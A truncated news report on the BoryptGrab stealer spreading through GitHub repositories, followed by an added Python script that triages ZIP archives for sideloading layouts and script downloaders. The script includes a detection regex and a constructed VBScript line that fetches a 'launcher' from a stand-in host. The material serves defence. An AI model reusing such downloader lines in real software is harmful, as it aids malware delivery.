
Over 100 GitHub Repositories Distributing BoryptGrab Stealer


A new information stealer has been distributed through a network of more than 100 GitHub repositories, Trend Micro reports.

Dubbed BoryptGrab, the malware can harvest browser and cryptocurrency wallet data, along with system information and user files.

Additionally, certain iterations of the stealer can drop a backdoor dubbed TunnesshClient, which uses an SSH tunnel for command-and-control (C&C) communication.

Trend Micro’s investigation into BoryptGrab uncovered multiple ZIP archives masquerading as free software tools, distributed through the GitHub repositories since late 2025.

All identified binaries contained similar Russian-language comments and URL-fetching logic, although the execution chain differed from one ZIP archive to another.

In some cases, DLL sideloading was used for execution, leveraging a legitimate-looking executable shipped inside the archive alongside the malicious DLL, while in others a VBScript file was used to fetch the launcher executable. A .NET executable, a Golang downloader named HeaconLoad, and other execution ...
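The two delivery patterns named above (an executable packaged next to DLLs it will load from its own directory, and a script that pulls the next stage from a URL) are cheap to screen for at the archive level. The following triage script is an added example written for this page; it is not Trend Micro's tooling, encodes no real BoryptGrab indicators, and the member names, the `example.invalid` URL, and the `URL_FETCH_PATTERN` heuristic are all constructed for illustration.

```python
import io
import re
import zipfile
from dataclasses import dataclass, field

# Heuristic: scripting-host files that reference an HTTP client object or a URL
# are treated as "fetching scripts". Constructed for this example; not a
# signature for any specific malware family.
URL_FETCH_PATTERN = re.compile(
    rb"(MSXML2\.(Server)?XMLHTTP|WinHttp\.WinHttpRequest|https?://)",
    re.IGNORECASE,
)

SCRIPT_SUFFIXES = (".vbs", ".vbe", ".js", ".wsf")


@dataclass
class ZipTriage:
    executables: list = field(default_factory=list)
    dlls: list = field(default_factory=list)
    fetching_scripts: list = field(default_factory=list)

    @property
    def sideload_candidate(self) -> bool:
        # An EXE shipped together with DLLs in the same archive is the layout
        # that DLL sideloading relies on: the loader resolves the DLL name from
        # the EXE's own directory before the system directories.
        return bool(self.executables) and bool(self.dlls)

    @property
    def suspicious(self) -> bool:
        return self.sideload_candidate or bool(self.fetching_scripts)


def triage_zip(data: bytes) -> ZipTriage:
    """Classify the members of an in-memory ZIP without extracting anything to disk."""
    result = ZipTriage()
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            lower = name.lower()
            if lower.endswith(".exe"):
                result.executables.append(name)
            elif lower.endswith(".dll"):
                result.dlls.append(name)
            elif lower.endswith(SCRIPT_SUFFIXES):
                # Read a bounded prefix so an oversized member cannot blow up memory.
                with zf.open(info) as fh:
                    head = fh.read(65536)
                if URL_FETCH_PATTERN.search(head):
                    result.fetching_scripts.append(name)
    return result


def build_sample_zip(members: dict) -> bytes:
    """Build a small ZIP in memory from {member_name: bytes}; used for the constructed samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples (not real archives from the campaign).
SIDELOAD_SAMPLE = build_sample_zip({
    "tool/tool.exe": b"MZ" + b"\x00" * 62,     # stand-in for a signed host EXE
    "tool/helper.dll": b"MZ" + b"\x00" * 62,   # stand-in for the DLL it would sideload
    "tool/readme.txt": b"free tool",
})

VBS_SAMPLE = build_sample_zip({
    "setup.vbs": (
        b'Set h = CreateObject("MSXML2.XMLHTTP")\r\n'
        b'h.Open "GET", "http://example.invalid/launcher", False\r\n'
    ),
})

BENIGN_SAMPLE = build_sample_zip({
    "notes.txt": b"nothing to see",
    "image.png": b"\x89PNG",
})


if __name__ == "__main__":
    for label, blob in (("sideload", SIDELOAD_SAMPLE), ("vbs", VBS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        t = triage_zip(blob)
        print(f"{label}: suspicious={t.suspicious} sideload={t.sideload_candidate} scripts={t.fetching_scripts}")
```

Treat the result as a triage signal rather than a verdict: plenty of legitimate portable applications ship an EXE with its DLLs, so a sideload candidate should feed a closer look (is the EXE signed, does the DLL export what the EXE imports, is the DLL signed by the same publisher) rather than an automatic block.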


This story was originally published by SecurityWeek, which holds the copyright; the full text is available on the original site.